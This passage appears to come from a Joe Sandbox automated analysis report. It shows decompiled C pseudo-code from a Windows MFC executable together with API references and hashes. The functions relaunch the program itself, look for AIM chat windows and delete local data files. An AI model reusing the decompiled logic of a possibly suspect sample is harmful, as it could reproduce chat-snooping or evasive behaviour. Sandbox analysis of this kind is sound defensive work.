    				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
    				L0043DD36();
    				 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
    				return _t14;
    			}

    Instruction addresses: 0x0040f75a, 0x0040f75f, 0x0040f763, 0x0040f769, 0x0040f770, 0x0040f778, 0x0040f77c, 0x0040f781, 0x0040f788, 0x0040f78d, 0x0040f794, 0x0040f79d, 0x0040f7a5

    APIs
    • __EH_prolog.LIBCMT ref: 0040F75A
    • #800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F770
    • #800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F77C
    • #800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F788
    • #800.MFC42(?,?,0040FFF7,?,?,00000000), ref: 0040F794
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$H_prolog
    • String ID:
    • API String ID: 948933410-0
    • Opcode ID: f2d54fb8f1e19156ad55e2047d5d6a3b2eb8c965d108a305ef757253412f0154
    • Instruction ID: fa49b21865b06008bfd86b72ccb0f1e2ac40f874668d777ff269ff9f2165e01d
    • Opcode Fuzzy Hash: f2d54fb8f1e19156ad55e2047d5d6a3b2eb8c965d108a305ef757253412f0154
    • Instruction Fuzzy Hash: 7AF0A071C00650DBC724EF55E5027DDBBB4AF19318F108A4EA063535C2DBBC6B08CA65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E0041F337(void* __eax, void* __ecx) {
    
    				_push(0x421);
    				L0043DFA6();
    				_push(__eax);
    				_push(0x487);
    				L0043E066();
    				L0043E07E();
    				_push(__eax);
    				_push(0x488);
    				L0043E066();
    				L0043E07E();
    				return __eax;
    			}

    Instruction addresses: 0x0041f33b, 0x0041f340, 0x0041f349, 0x0041f34a, 0x0041f34f, 0x0041f356, 0x0041f35b, 0x0041f35c, 0x0041f363, 0x0041f36a, 0x0041f371

    APIs
    • #4055.MFC42(00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F340
    • #3092.MFC42(00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F34F
    • #2642.MFC42(00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F356
    • #3092.MFC42(00000488,00000000,00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F363
    • #2642.MFC42(00000488,00000000,00000487,00000000,00000421,?,-0000006C,0041F331,00000487,00000001,0000047D,00000001), ref: 0041F36A
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2642#3092$#4055
    • String ID:
    • API String ID: 2023933615-0
    • Opcode ID: f3dbdd2160befd96720a4ff40d2f2d029b019cadcc901d40ba252bf5709c9fb3
    • Instruction ID: 2639641d39459c8651f4fea45481419ab9322e2553ac95ad5fd1ddccea15420d
    • Opcode Fuzzy Hash: f3dbdd2160befd96720a4ff40d2f2d029b019cadcc901d40ba252bf5709c9fb3
    • Instruction Fuzzy Hash: 97D09E5174213463A97C32F7691BE5E0866CBC9F64F45142F72059B2D2ECD84D0242BD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004191EA(void* __ecx, void* __eflags) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOA _v88;
    				char _v348;
    				void* __esi;
    				void* _t16;
    				void* _t19;
    
    				_t19 = __ecx;
    				E0042A660( &_v348, 5, 0);
    				memset( &_v88, 0, 0x44);
    				_v88.cb = 0x44;
    				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) != 0) {
    					PostMessageA( *(L004044C9(_t15, _t19, 0) + 0x20), 0x111, 0xdf, 0);
    				}
    				_t16 = 1;
    				return _t16;
    			}

    Instruction addresses: 0x004191ea, 0x00419200, 0x0041920c, 0x00419217, 0x00419239, 0x0041924e, 0x0041924e, 0x00419256, 0x00419259

    APIs
      • Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
      • Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
      • Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0
    • memset.MSVCRT ref: 0041920C
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00419231
    • PostMessageA.USER32 ref: 0041924E
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: lstrlen$CreateFileMessageModuleNamePostProcesslstrcatmemset
    • String ID: D
    • API String ID: 3248123876-2746444292
    • Opcode ID: ba0d2a22f40231743dad335c73caf42ec4d8e7ef636ac726507e5e302ea1bed6
    • Instruction ID: e4446a854a9f59742e6da9aa588432f28d4fe446af13b19b3e08c02e28e328fa
    • Opcode Fuzzy Hash: ba0d2a22f40231743dad335c73caf42ec4d8e7ef636ac726507e5e302ea1bed6
    • Instruction Fuzzy Hash: 45F09CB25015287AEB20EBD19C0EFDB7B6CDF45704F000062B705F5185E6789648C6F4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 32%
    			E00419674(void* __ecx) {
    				void* __esi;
    				long _t7;
    				void* _t8;
    				void* _t10;
    				void* _t17;
    
    				_t17 = __ecx;
    				L0043DF94();
    				_t7 = GetSysColor(0xf);
    				_push("Verdana");
    				 *(_t17 + 0x158) = _t7;
    				 *((intOrPtr*)(_t17 + 0x150)) = 0x2bc;
    				 *((intOrPtr*)(_t17 + 0x14c)) = 0xe;
    				L0043DDD2();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t17);
    				_push(1);
    				_t8 = L00404F47(_t7, _t17 + 0xb4, _t17);
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t17);
    				_push(2);
    				L00404F47(_t8, _t17 + 0x60, _t17);
    				_t10 = 1;
    				return _t10;
    			}

    Instruction addresses: 0x00419678, 0x0041967a, 0x00419681, 0x00419687, 0x00419692, 0x00419698, 0x004196a2, 0x004196ac, 0x004196b6, 0x004196bd, 0x004196c3, 0x004196c4, 0x004196c5, 0x004196c6, 0x004196ce, 0x004196d3, 0x004196d5, 0x004196d6, 0x004196d7, 0x004196d8, 0x004196d9, 0x004196de, 0x004196e5, 0x004196ea

    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4710#860Color
    • String ID: Verdana
    • API String ID: 99654537-987297809
    • Opcode ID: a309e88e507152e25b0760b4dbc22f954db3bbeec0023c5049c9c43a9bb807de
    • Instruction ID: d336a922067e42d1036fd7cc1a44f00c4f32b011d06697dc262961c48fe27f2c
    • Opcode Fuzzy Hash: a309e88e507152e25b0760b4dbc22f954db3bbeec0023c5049c9c43a9bb807de
    • Instruction Fuzzy Hash: 53F09C71241B447AD230A762DC46FE37B9CDFC1769F00042EB299962C1CBF53444C664
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E004211EB(intOrPtr __ecx) {
    				void* __esi;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr* _t34;
    				intOrPtr _t37;
    				void* _t39;
    
    				_t20 = E0043E4E0(0x442121, _t39);
    				_push(__ecx);
    				_push(__ecx);
    				_t37 = __ecx;
    				 *((intOrPtr*)(_t39 - 0x10)) = __ecx;
    				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
    				_t34 = __ecx + 0x1b8;
    				 *((intOrPtr*)(_t39 - 0x14)) = _t34;
    				 *_t34 = 0x445440;
    				 *(_t39 - 4) = 5;
    				L0043DD72();
    				 *_t34 = 0x44547c;
    				 *(_t39 - 4) = 3;
    				_t21 = L00404F36(_t20, __ecx + 0x164, __ecx);
    				 *(_t39 - 4) = 2;
    				_t22 = L00404F36(_t21, _t37 + 0x110, _t37);
    				 *(_t39 - 4) = 1;
    				_t23 = L00404F36(_t22, _t37 + 0xbc, _t37);
    				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
    				_t24 = L00404F36(_t23, _t37 + 0x68, _t37);
    				 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
    				L0043E04E();
    				 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
    				return _t24;
    			}

    Instruction addresses: 0x004211f0, 0x004211f5, 0x004211f6, 0x004211f8, 0x004211fb, 0x004211fe, 0x00421202, 0x00421208, 0x0042120b, 0x00421213, 0x00421217, 0x00421222, 0x00421228, 0x0042122c, 0x00421237, 0x0042123b, 0x00421246, 0x0042124a, 0x0042124f, 0x00421256, 0x0042125b, 0x00421261, 0x0042126b, 0x00421273

    APIs
    • __EH_prolog.LIBCMT ref: 004211F0
    • #2414.MFC42(00000002,?,?,?,00420E6C), ref: 00421217
    • #641.MFC42(?,?,?,00420E6C), ref: 00421261
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2414#641H_prolog
    • String ID: !!D
    • API String ID: 912312548-1004561839
    • Opcode ID: 576ea9901b5aea2dac143cf1b7436eeae3910afb9926ab473c9004a8fa348e7a
    • Instruction ID: 92f7a0fcd6771769057712b8fb6cdd5dd9fba54cd2aef058bfb8156e80c88354
    • Opcode Fuzzy Hash: 576ea9901b5aea2dac143cf1b7436eeae3910afb9926ab473c9004a8fa348e7a
    • Instruction Fuzzy Hash: 8B01D470911785EBE725EBA5C1063DDFBB8AF55308F10459EA052A32C3CBF82B04CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E004274E3(intOrPtr __ecx) {
    				intOrPtr _t22;
    				void* _t28;
    
    				E0043E4E0(0x442d4e, _t28);
    				_push(__ecx);
    				_t22 =  *((intOrPtr*)(_t28 + 8));
    				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
    				E0040BCF2(__ecx, _t22);
    				 *((intOrPtr*)(__ecx + 0x1070)) =  *((intOrPtr*)(_t22 + 0x1070));
    				_push(_t22 + 0x1074);
    				L0043DD3C();
    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
    				_push(_t22 + 0x1078);
    				L0043DD3C();
    				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
    				return __ecx;
    			}

    Instruction addresses: 0x004274e8, 0x004274ed, 0x004274f0, 0x004274f6, 0x004274f9, 0x0042750a, 0x00427516, 0x00427517, 0x0042751c, 0x00427526, 0x0042752d, 0x00427539, 0x00427541

    APIs
    • __EH_prolog.LIBCMT ref: 004274E8
    • #535.MFC42(?,?,?,?,?,0042701A,?), ref: 00427517
    • #535.MFC42(?,?,?,?,?,?,0042701A,?), ref: 0042752D
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535$H_prolog
    • String ID: N-D
    • API String ID: 3656073097-3571361470
    • Opcode ID: 1a1a6f58413525e08d920d0ee401738c90dfd408a443bacd302b5cfcae44a98a
    • Instruction ID: e7e9645546bb46de31f5a3da6648b244fe9be9829d53cd81cffe09f7b0bebaad
    • Opcode Fuzzy Hash: 1a1a6f58413525e08d920d0ee401738c90dfd408a443bacd302b5cfcae44a98a
    • Instruction Fuzzy Hash: 60F0BEB2E00940ABC314DB39E805ADAF3B8FF54304F00462FB49693280CBB87945C694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00429098(void* __ecx, intOrPtr _a4, struct _SYSTEMTIME* _a8) {
    				int _v8;
    
    				_v8 = 0;
    				 *0x455b1c = 0;
    				GetDateFormatA(0x400, 0, _a8, "dddd, d MMMM", 0x455b1c, 0x32);
    				CharUpperBuffA(0x455b1c, 1);
    				_push(0x455b1c);
    				L0043DE26();
    				return _a4;
    			}

    Instruction addresses: 0x004290af, 0x004290b2, 0x004290bd, 0x004290c6, 0x004290cf, 0x004290d0, 0x004290da

    APIs
    • GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
    • CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
    • #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537BuffCharDateFormatUpper
    • String ID: dddd, d MMMM
    • API String ID: 2423585594-105496283
    • Opcode ID: 3c052a69963cfdfaac25dbe1050f1dadaad5edd881074f0bead04f97d299ab8e
    • Instruction ID: 7d7aa03fcd28e46fa82bf98781ac0401ed261906eab1b52d3a0f3e318760c2b6
    • Opcode Fuzzy Hash: 3c052a69963cfdfaac25dbe1050f1dadaad5edd881074f0bead04f97d299ab8e
    • Instruction Fuzzy Hash: 0FE0D834251614BFD701AB54EC0AEEE3F6CDB56351F008016FD049B182D2B09A408BA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409941(struct HWND__* _a4, char* _a8) {
    				struct HWND__* _t6;
    
    				if(_a4 != 0) {
    					_t6 = strncmp(_a8, "AIM_ChatWnd", 0xb);
    					if(_t6 != 0) {
    						goto L1;
    					}
    					return FindWindowExA(_a4, _t6, "WndAte32Class", _t6) & 0xffffff00 | _t8 != 0x00000000;
    				}
    				L1:
    				return 0;
    			}





    APIs
    • strncmp.MSVCRT(?,AIM_ChatWnd,0000000B), ref: 00409957
    • FindWindowExA.USER32 ref: 0040996F
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindWindowstrncmp
    • String ID: AIM_ChatWnd$WndAte32Class

    C-Code - Quality: 53%
    			E004254F6(void* __ecx) {
    				char _v8;
    				CHAR** _t3;
    				int _t4;
    
    				_push("web.dat");
    				_t3 =  &_v8;
    				_push(0x4558c4);
    				_push(_t3);
    				L0043DE20();
    				_t4 = DeleteFileA( *_t3);
    				L0043DD36();
    				return _t4;
    			}







    APIs
    • #924.MFC42(?,004558C4,web.dat), ref: 00425509
    • DeleteFileA.KERNEL32(00000000,?,004558C4,web.dat), ref: 00425510
    • #800.MFC42 ref: 0042551B
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800#924DeleteFile
    • String ID: web.dat

    C-Code - Quality: 53%
    			E004207A5(void* __ecx) {
    				char _v8;
    				CHAR** _t3;
    				int _t4;
    
    				_push("bpk.dat");
    				_t3 =  &_v8;
    				_push(0x4558c4);
    				_push(_t3);
    				L0043DE20();
    				_t4 = DeleteFileA( *_t3);
    				L0043DD36();
    				return _t4;
    			}







    APIs
    • #924.MFC42(?,004558C4,bpk.dat), ref: 004207B8
    • DeleteFileA.KERNEL32(00000000,?,004558C4,bpk.dat), ref: 004207BF
    • #800.MFC42 ref: 004207CA
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800#924DeleteFile
    • String ID: bpk.dat

    C-Code - Quality: 62%
    			E00425013() {
    				CHAR** _t6;
    				void* _t10;
    
    				_push("temporary.bmp");
    				 *((intOrPtr*)(_t10 - 0x28)) =  *((intOrPtr*)(_t10 - 0x14));
    				_t6 = _t10 + 8;
    				_push(0x4558c8);
    				_push(_t6);
    				L0043DE20();
    				DeleteFileA( *_t6);
    				L0043DD36();
    				 *0x4558fc =  *0x4558fc & 0x00000000;
    				return E00425049;
    			}






    APIs
    • #924.MFC42(?,004558C8,temporary.bmp), ref: 00425027
    • DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp), ref: 0042502E
    • #800.MFC42 ref: 00425037
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: #800#924DeleteFile
    • String ID: temporary.bmp

    C-Code - Quality: 78%
    			E004102F8(intOrPtr __ecx) {
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				intOrPtr* _t131;
    				intOrPtr* _t133;
    				intOrPtr* _t134;
    				intOrPtr* _t151;
    				intOrPtr _t152;
    				intOrPtr _t154;
    				intOrPtr* _t155;
    				intOrPtr* _t158;
    				intOrPtr _t161;
    				intOrPtr* _t162;
    				intOrPtr _t189;
    				intOrPtr _t191;
    				intOrPtr _t200;
    				intOrPtr* _t201;
    				intOrPtr _t204;
    				intOrPtr* _t205;
    				intOrPtr _t206;
    				intOrPtr* _t207;
    				intOrPtr _t210;
    				intOrPtr* _t212;
    				signed int _t213;
    				intOrPtr* _t215;
    				intOrPtr* _t217;
    				intOrPtr _t218;
    				void* _t220;
    
    				E0043E4E0(0x4404a5, _t220);
    				 *((intOrPtr*)(_t220 - 0x10)) = __ecx;
    				_t212 =  *((intOrPtr*)(_t220 + 0xc));
    				E004107BC(_t220 + 0xc);
    				_t217 =  *_t212;
    				_t128 =  *0x4553c0; // 0x2acaa0
    				_t151 = _t212 + 8;
    				 *((intOrPtr*)(_t220 - 0x14)) = _t212;
    				 *((intOrPtr*)(_t220 - 0x18)) = _t151;
    				if(_t217 != _t128) {
    					_t158 =  *_t151;
    					if(_t158 == _t128) {
    						goto L6;
    					} else {
    						goto L3;
    					}
    					while(1) {
    						L3:
    						_t210 =  *_t158;
    						if(_t210 == _t128) {
    							break;
    						}
    						_t158 = _t210;
    					}
    					_t217 =  *((intOrPtr*)(_t158 + 8));
    					 *((intOrPtr*)(_t220 - 0x14)) = _t158;
    					 *((intOrPtr*)(_t220 - 0x18)) = _t158 + 8;
    					goto L6;
    				} else {
    					_t217 =  *_t151;
    					L6:
    					__imp__??0_Lockit@std@@QAE@XZ();
    					_t129 =  *((intOrPtr*)(_t220 - 0x14));
    					 *(_t220 - 4) =  *(_t220 - 4) & 0x00000000;
    					if(_t129 == _t212) {
    						_t204 =  *((intOrPtr*)(_t220 - 0x10));
    						 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t129 + 4));
    						_t161 =  *((intOrPtr*)(_t204 + 4));
    						if( *((intOrPtr*)(_t161 + 4)) != _t212) {
    							_t162 =  *((intOrPtr*)(_t212 + 4));
    							if( *_t162 != _t212) {
    								 *((intOrPtr*)(_t162 + 8)) = _t217;
    							} else {
    								 *_t162 = _t217;
    							}
    						} else {
